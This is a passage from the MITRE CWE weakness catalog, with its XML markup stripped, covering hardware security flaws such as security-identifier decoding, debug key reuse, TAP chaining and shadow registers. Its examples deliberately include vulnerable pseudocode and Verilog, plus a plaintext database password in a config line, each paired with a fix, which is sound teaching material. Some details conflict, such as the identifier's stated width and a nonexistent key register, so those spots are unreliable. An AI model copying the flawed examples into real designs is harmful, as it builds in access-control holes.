size of the security identifier is 4 bits (i.e., bit 3 through 0). Each bit in these 4 bits defines a security identifier. There are only 4 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., "1") allows respective action from an agent whose identity matches the number of the bit. If clear (i.e., "0"), disallows the respective action to that corresponding agent. + + + RegisterField description + AES_ENC_DEC_KEY_0AES key [0:31] for encryption or decryptionDefault 0x00000000 + AES_ENC_DEC_KEY_1AES key [32:63] for encryption or decryptionDefault 0x00000000 + AES_ENC_DEC_KEY_2AES key [64:95] for encryption or decryptionDefault 0x00000000 + AES_ENC_DEC_KEY_3AES key [96:127] for encryption or decryptionDefault 0x00000000 + AES_KEY_ACCESS_POLCY[31:4] Default 0x00000000[3:0]-0x01 agent with Security Identified "1" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers + + + + + The following Pseudo code outlines the process of checking the value of the Security Identifier within the AES_KEY_ACCESS_POLICY register: + + + + + If (AES_KEY_ACCESS_POLICY[Security_Identifier] == "1") + + + Allow access to AES-Key registers + + + Else + + + Deny access to AES-Key registers + + + + + Below is a decoder's Pseudo code that only checks for bit [14] of the bus transaction to determine what Security Identifier it must assign. + + + + + If (Bus_transaction[14] == "1") + + + Security_Identifier == "1" + + + Else + + + Security_Identifier == "0" + + + + + The security identifier is two bits, but the decoder code above only checks the value of one bit. Two Masters have their bit 0 set to "1" - Master_1 and Master_3. Master_1 is trusted, while Master_3 is not. The code above would therefore allow an untrusted agent, Master_3, access to the AES-Key registers in addition to intended trusted Master_1. + + The decoder should check for the entire size of the security identifier in the bus-transaction signal to assign a corresponding security identifier. The following is good Pseudo code: + + + + + + If (Bus_transaction[15:14] == "00") + + + Security_Identifier == "0" + + + If (Bus_transaction[15:14] == "01") + + + Security_Identifier == "1" + + + If (Bus_transaction[15:14] == "10") + + + Security_Identifier == "2" + + + If (Bus_transaction[15:14] == "11") + + + Security_Identifier == "3" + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-04-29 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The same public key is used for signing both debug and production code. + + A common usage of public-key cryptography is to verify the integrity and authenticity of another entity (for example a firmware binary). If a company wants to ensure that its firmware runs only on its own hardware, before the firmware runs, an encrypted hash of the firmware image will be decrypted with the public key and then verified against the now-computed hash of the firmware image. This means that the public key forms the root of trust, which necessitates that the public key itself must be protected and used properly. + During the development phase, debug firmware enables many hardware debug hooks, debug modes, and debug messages for testing. Those debug facilities provide significant, additional views about the firmware's capability and, in some cases, additional capability into the chip or SoC. If compromised, these capabilities could be exploited by an attacker to take full control of the system. + Once the product exits the manufacturing stage and enters production, it is good practice to use a different public key. Debug firmware images are known to leak. With the debug key being reused as the production key, the debug image will also work on the production image. Thus, it will open all the internal, debug capabilities to the attacker. + If a different public key is used for the production image, even if the attacker gains access to the debug firmware image, they will not be able to run it on a production machine. Thus, damage will be limited to the intellectual property leakage resulting from the debug image. + + + + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Other + Read Memory + Modify Memory + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Varies by Context + High + + + + + Architecture or Design Review + + Compare the debug key with the production key to make sure that they are not the same. + + High + + + Dynamic Analysis with Manual Results Interpretation + + Compare the debug key with the production key to make sure that they are not the same. + + High + + + + + Implementation + Use different keys for Production and Debug + + + + + This example illustrates the danger of using the same public key for debug and production. + + Suppose the product design requires frugality of silicon real estate. Assume that originally the architecture allows just enough storage for two 2048-bit RSA keys in the fuse: one to be used for debug and the other for production. However, in the meantime, a business decision is taken to make the security future-proof beyond 2030, which means the architecture needs to use the NIST-recommended 3072-bit keys instead of the originally-planned 2048-bit keys. This means that, at most, one key can be fully stored in the fuses, not two. So the product design team decides to use the same public key for debug and production. + + Increase the storage so that two different keys of the required size can be stored. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi + Intel Corporation + 2020-05-26 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset. + + In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. This security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes). + A typical bus connects several leader and follower agents. Some follower agents implement bus protocols differently from leader agents. A protocol conversion happens at a bridge to seamlessly connect different protocols on the bus. One example is a system that implements a leader with the Advanced High-performance Bus (AHB) protocol and a follower with the Open-Core Protocol (OCP). A bridge AHB-to-OCP is needed to translate the transaction from one form to the other. + A common weakness that can exist in this scenario is that this conversion between protocols is implemented incorrectly, whereupon an untrusted agent may gain unauthorized access to an asset. + + + + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases. + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + DoS: Resource Consumption (Other) + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Quality Degradation + High + + + + + Architecture and Design + Security identifier decoders must be reviewed for design inconsistency and common weaknesses. + + + Implementation + Access and programming flows must be tested in pre-silicon and post-silicon testing. + + + + + + + Consider a system that supports AHB. Let us assume we have a follower agent that only understands OCP. To connect this follower to the leader, a bridge is introduced, i.e., AHB to OCP. + + + The follower has assets to protect accesses from untrusted leaders, and it employs access controls based on policy, (e.g., AES-Key registers for encryption or decryption). The key is 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls. + + + The AES_KEY_ACCESS_POLICY access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The implemented AES_KEY_ACCESS_POLICY has 4 bits where each bit when "Set" allows access to the AES-Key registers to the corresponding agent that has the security identifier. The other bits from 31 through 4 are reserved and not used. + + + + + Register + + + Field Description + + + + + AES_ENC_DEC_KEY_0 + + + AES key [0:31] for encryption or decryption Default 0x00000000 + + + + + AES_ENC_DEC_KEY_1 + + + AES key [32:63] for encryption or decryption Default 0x00000000 + + + + + AES_ENC_DEC_KEY_2 + + + AES key [64:95] for encryption or decryption Default 0x00000000 + + + + + AES_ENC_DEC_KEY_3 + + + AES key [96:127] for encryption or decryption Default 0x00000000 + + + + + AES_KEY_ACCESS_POLICY + + + [31:4] Default 0x000000 [3:0] - 0x02 agent with Security Identifier "1" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers + + + + + During conversion of the AHB-to-OCP transaction, the security identifier information must be preserved and passed on to the follower correctly. + + + + In AHB-to-OCP bridge, the security identifier information conversion is done incorrectly. + + Because of the incorrect conversion, the security identifier information is either lost or could be modified in such a way that an untrusted leader can access the AES-Key registers. + The conversion of the signals from one protocol (AHB) to another (OCP) must be done while preserving the security identifier correctly. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-04-29 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product relies on one source of data, preventing the ability to detect if an adversary has compromised a data source. + + To operate successfully, a product sometimes has to implicitly trust the integrity of an information source. When information is implicitly signed, one can ensure that the data was not tampered in transit. This does not ensure that the information source was not compromised when responding to a request. By requesting information from multiple sources, one can check if all of the data is the same. If they are not, the system should report the information sources that respond with a different or minority value as potentially compromised. If there are not enough answers to provide a majority or plurality of responses, the system should report all of the sources as potentially compromised. As the seriousness of the impact of incorrect integrity increases, so should the number of independent information sources that would need to be queried. + + + + + + + + + + + + + + Architecture and Design + This flaw could be introduced during the design of the application or misconfiguration at run time by only specifying a single point of validation. + + + Implementation + Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases. + + + Operation + This weakness could be introduced by intentionally failing all but one of the devices used to retrieve the data or by failing the devices that validate the data. + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + Gain Privileges or Assume Identity + An attacker that may be able to execute a single Person-in-the-Middle attack can subvert a check of an external oracle (e.g. the ACME protocol check for a file on a website), and thus inject an arbitrary reply to the single perspective request to the external oracle. + + + + + Requirements + Design system to use a Practical Byzantine fault method, to request information from multiple sources to verify the data and report on potentially compromised information sources. + + + Implementation + Failure to use a Practical Byzantine fault method when requesting data. Lack of place to report potentially compromised information sources. Relying on non-independent information sources for integrity checking. Failure to report information sources that respond in the minority to incident response procedures. + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Kurt Seifried + Cloud Security Alliance + 2020-04-03 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2020-12-10 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented. + + Systems-On-Chip (Integrated circuits and hardware + engines) implement Security Identifiers to + differentiate/identify actions originated from various + agents. These actions could be 'read', 'write', 'program', + 'reset', 'fetch', 'compute', etc. Security identifiers are + generated and assigned to every agent in the System (SoC) + that is either capable of generating an action or receiving + an action from another agent. Every agent could be assigned + a unique, Security Identifier based on its trust level or + privileges. + A broad class of flaws can exist in the Security + Identifier process, including but not limited to missing + security identifiers, improper conversion of security + identifiers, incorrect generation of security identifiers, + etc. + + + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases. + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + DoS: Resource Consumption (Other) + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Quality Degradation + High + + + + + Architecture and Design + Security Identifier Decoders must be reviewed for design inconsistency and common weaknesses. + + + Implementation + Access and programming flows must be tested in pre-silicon and post-silicon testing. + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-07-17 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages. + + Debug messages are messages that help troubleshoot an issue by revealing the internal state of the system. For example, debug data in design can be exposed through internal memory array dumps or boot logs through interfaces like UART via TAP commands, scan chain, etc. Thus, the more information contained in a debug message, the easier it is to debug. However, there is also the risk of revealing information that could help an attacker either decipher a vulnerability, and/or gain a better understanding of the system. Thus, this extra information could lower the "security by obscurity" factor. While "security by obscurity" alone is insufficient, it can help as a part of "Defense-in-depth". + + + + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Read Memory + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Varies by Context + Medium + + + + + Implementation + Ensure that a debug message does not reveal any unnecessary information during the debug process for the intended response. + + + + + This example here shows how an attacker can take advantage of unnecessary information in debug messages. + Example 1: Suppose in response to a Test Access Port (TAP) chaining request the debug message also reveals the current TAP hierarchy (the full topology) in addition to the success/failure message. + Example 2: In response to a password-filling request, the debug message, instead of a simple Granted/Denied response, prints an elaborate message, "The user-entered password does not match the actual password stored in <directory name>." + The result of the above examples is that the user is able to gather additional unauthorized information about the system from the debug messages. + The solution is to ensure that Debug messages do not reveal additional details. + + + + + CVE-2020-24491 + Processor generates debug message that contains sensitive information ("addresses of memory transactions"). + https://www.cve.org/CVERecord?id=CVE-2020-24491 + + + CVE-2017-18326 + modem debug messages include cryptographic keys + https://www.cve.org/CVERecord?id=CVE-2017-18326 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi + Intel Corporation + 2020-05-31 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's debug components contain incorrect chaining or granularity of debug components. + + For debugging and troubleshooting a chip, several hardware design elements are often implemented, including: + + Various Test Access Ports (TAPs) allow boundary scan commands to be executed. + For scanning the internal components of a chip, there are scan cells that allow the chip to be used as a "stimulus and response" mechanism. + Chipmakers might create custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs. + + Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could allow unintended access permissions. + + + + + + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Authentication + Authorization + Availability + Accountability + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + Modify Memory + Modify Files or Directories + Medium + Depending on the access to debug component(s) erroneously granted, an attacker could use the debug component to gain additional understanding about the system to further an attack and/or execute other commands. This could compromise any security property, including the ones listed above. + + + + + Architecture or Design Review + Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials. + High + + + Dynamic Analysis with Manual Results Interpretation + Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials. + High + + + + + Implementation + Ensure that debug components are properly chained and their granularity is maintained at different authentication levels. + + + + + The following example shows how an attacker can take advantage of incorrect chaining or missing granularity of debug components. + In a System-on-Chip (SoC), the user might be able to access the SoC-level TAP with a certain level of authorization. However, this access should not also grant access to all of the internal TAPs (e.g., Core). Separately, if any of the internal TAPs is also stitched to the TAP chain when it should not be because of a logic error, then an attacker can access the internal TAPs as well and execute commands there. + As a related example, suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented and the attacker can gain unauthorized access. + + + + + CVE-2017-18347 + Incorrect access control in RDP Level 1 on STMicroelectronics STM32F0 series devices allows physically present attackers to extract the device's protected firmware via a special sequence of Serial Wire Debug (SWD) commands because there is a race condition between full initialization of the SWD interface and the setup of flash protection. + https://www.cve.org/CVERecord?id=CVE-2017-18347 + + + CVE-2020-1791 + There is an improper authorization vulnerability in several smartphones. The system has a logic-judging error, and, under certain scenarios, a successful exploit could allow the attacker to switch to third desktop after a series of operations in ADB mode. (Vulnerability ID: HWPSIRT-2019-10114). + https://www.cve.org/CVERecord?id=CVE-2020-1791 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-05-31 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors. + + In contrast to complete vertical integration of architecting, designing, manufacturing, assembling, and testing chips all within a single organization, an organization can choose to simply architect and design a chip before outsourcing the rest of the process to OSAT entities (e.g., external foundries and test houses). In the latter example, the device enters an OSAT facility in a much more vulnerable pre-production stage where many debug and test modes are accessible. Therefore, the chipmaker must place a certain level of trust with the OSAT. To counter this, the chipmaker often requires the OSAT partner to enter into restrictive non-disclosure agreements (NDAs). Nonetheless, OSAT vendors likely have many customers, which increases the risk of accidental sharing of information. There may also be a security vulnerability in the information technology (IT) system of the OSAT facility. Alternatively, a malicious insider at the OSAT facility may carry out an insider attack. Considering these factors, it behooves the chipmaker to minimize any confidential information in the device that may be accessible to the OSAT vendor. + Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could provide improper authorization to sensitive information. + + + + + + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Authentication + Authorization + Availability + Accountability + Non-Repudiation + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + Modify Memory + Modify Files or Directories + Medium + The impact depends on the confidential information itself and who is inadvertently granted access. For example, if the confidential information is a key that can unlock all the parts of a generation, the impact could be severe. + + + + + Architecture or Design Review + Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility. + High + + + Dynamic Analysis with Manual Results Interpretation + Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility. + Moderate + + + + + Architecture and Design + + + Ensure that when an OSAT vendor is allowed to access test interfaces necessary for preproduction and returned parts, the vendor only pulls the minimal information necessary. Also, architect the product in such a way that, when an "unlock device" request comes, it only unlocks that specific part and not all the parts for that product line. + Ensure that the product's non-volatile memory (NVM) is scrubbed of all confidential information and secrets before handing it over to an OSAT. + Arrange to secure all communication between an OSAT facility and the chipmaker. + + + Moderate + + + + + + The following example shows how an attacker can take advantage of a piece of confidential information that has not been protected from the OSAT. + Suppose the preproduction device contains NVM (a storage medium that by definition/design can retain its data without power), and this NVM contains a key that can unlock all the parts for that generation. An OSAT facility accidentally leaks the key. + Compromising a key that can unlock all the parts of a generation can be devastating to a chipmaker. + The likelihood of such a compromise can be reduced by ensuring all memories on the preproduction device are properly scrubbed. + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry might be subject to CWE Scope Exclusion SCOPE.SITUATIONS (Focus on situations in which weaknesses may appear); SCOPE.HUMANPROC (Human/organizational process; and/or SCOPE.CUSTREL (Not customer-relevant). + This entry is still under development and will continue to see updates and content improvements. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-05-29 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A race condition in the hardware logic results in undermining security guarantees of the system. + + A race condition in logic circuits typically occurs when a logic gate gets inputs from signals that have traversed different paths while originating from the same source. Such inputs to the gate can change at slightly different times in response to a change in the source signal. This results in a timing error or a glitch (temporary or permanent) that causes the output to change to an unwanted state before settling back to the desired state. If such timing errors occur in access control logic or finite state machines that are implemented in security sensitive flows, an attacker might exploit them to circumvent existing protections. + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Alter Execution Logic + + + + + Architecture and Design + Adopting design practices that encourage designers to recognize and eliminate race conditions, such as Karnaugh maps, could result in the decrease in occurrences of race conditions. + + + Implementation + Logic redundancy can be implemented along security critical paths to prevent race conditions. To avoid metastability, it is a good practice in general to default to a secure state in which access is not given to untrusted agents. + + + + + The code below shows a 2x1 multiplexor using logic gates. Though the code shown below results in the minimum gate solution, it is disjoint and causes glitches. + + // 2x1 Multiplexor using logic-gates + + module glitchEx( + + input wire in0, in1, sel, + output wire z + + ); + + wire not_sel; + wire and_out1, and_out2; + + assign not_sel = ~sel; + assign and_out1 = not_sel & in0; + assign and_out2 = sel & in1; + + // Buggy line of code: + assign z = and_out1 | and_out2; // glitch in signal z + + endmodule + + The buggy line of code, commented above, results in signal 'z' periodically changing to an unwanted state. Thus, any logic that references signal 'z' may access it at a time when it is in this unwanted state. This line should be replaced with the line shown below in the Good Code Snippet which results in signal 'z' remaining in a continuous, known, state. Reference for the above code, along with waveforms for simulation can be found in the references below. + + assign z <= and_out1 or and_out2 or (in0 and in1); + + This line of code removes the glitch in signal z. + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-10 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The lack of protections on alternate paths to access + control-protected assets (such as unprotected shadow registers + and other external facing unguarded interfaces) allows an + attacker to bypass existing protections to the asset that are + only performed against the primary path. + + An asset inside a chip might have access-control + protections through one interface. However, if all paths to + the asset are not protected, an attacker might compromise + the asset through alternate paths. These alternate paths + could be through shadow or mirror registers inside the IP + core, or could be paths from other external-facing + interfaces to the IP core or SoC. + Consider an SoC with various interfaces such as UART, + SMBUS, PCIe, USB, etc. If access control is implemented for + SoC internal registers only over the PCIe interface, then + an attacker could still modify the SoC internal registers + through alternate paths by coming through interfaces such + as UART, SMBUS, USB, etc. + Alternatively, attackers might be able to bypass + existing protections by exploiting unprotected, shadow + registers. Shadow registers and mirror registers typically + refer to registers that can be accessed from multiple + addresses. Writing to or reading from the aliased/mirrored + address has the same effect as writing to the address of + the main register. They are typically implemented within an + IP core or SoC to temporarily hold certain data. These data + will later be updated to the main register, and both + registers will be in synch. If the shadow registers are not + access-protected, attackers could simply initiate + transactions to the shadow registers and compromise system + security. + + + + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + DoS: Resource Consumption (Other) + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Alter Execution Logic + Bypass Protection Mechanism + Quality Degradation + High + + + + + Requirements + Protect assets from accesses against all potential interfaces and alternate paths. + Defense in Depth + + + Architecture and Design + Protect assets from accesses against all potential interfaces and alternate paths. + Defense in Depth + + + Implementation + Protect assets from accesses against all potential interfaces and alternate paths. + Defense in Depth + + + + + + + Register SECURE_ME is located at address 0xF00. A + mirror of this register called COPY_OF_SECURE_ME is + at location 0x800F00. The register SECURE_ME is + protected from malicious agents and only allows + access to select, while COPY_OF_SECURE_ME is not. + + + Access control is implemented using an allowlist (as + indicated by acl_oh_allowlist). The identity of the + initiator of the transaction is indicated by the + one hot input, incoming_id. This is checked against + the acl_oh_allowlist (which contains a list of + initiators that are allowed to access the asset). + + + Though this example is shown in Verilog, it will + apply to VHDL as well. + + + + module foo_bar(data_out, data_in, incoming_id, address, clk, rst_n); + output [31:0] data_out; + input [31:0] data_in, incoming_id, address; + input clk, rst_n; + wire write_auth, addr_auth; + reg [31:0] data_out, acl_oh_allowlist, q; + assign write_auth = | (incoming_id & acl_oh_allowlist) ? 1 : 0; + always @* + + acl_oh_allowlist <= 32'h8312; + + assign addr_auth = (address == 32'hF00) ? 1: 0; + always @ (posedge clk or negedge rst_n) + + if (!rst_n) + + begin + + q <= 32'h0; + data_out <= 32'h0; + + end + + else + + begin + + q <= (addr_auth & write_auth) ? data_in: q; + data_out <= q; + + end + + end + + endmodule + + assign addr_auth = (address == 32'hF00) ? 1: 0; + The bugged line of code is repeated in the Bad + example above. Weakness arises from the fact that the + SECURE_ME register can be modified by writing to the + shadow register COPY_OF_SECURE_ME, the address of + COPY_OF_SECURE_ME should also be included in the check. + That buggy line of code should instead be replaced as + shown in the Good Code Snippet below. + + assign addr_auth = (address == 32'hF00 || address == 32'h800F00) ? 1: 0; + + + + + CVE-2017-18293 + When GPIO is protected by blocking access + to corresponding GPIO resource registers, + protection can be bypassed by writing to the + corresponding banked GPIO registers instead. + + https://www.cve.org/CVERecord?id=CVE-2017-18293 + + + CVE-2020-15483 + monitor device allows access to physical UART debug port without authentication + https://www.cve.org/CVERecord?id=CVE-2020-15483 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-10-02 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Common_Consequences, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers. + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + + + + + Implementation + Credentials stored in configuration files should be encrypted, Use standard APIs and industry accepted algorithms to encrypt the credentials stored in configuration files. + + + + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database, but the pair is stored in plaintext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in plaintext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + + + ASP.NET Misconfiguration: Password in Configuration File + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a 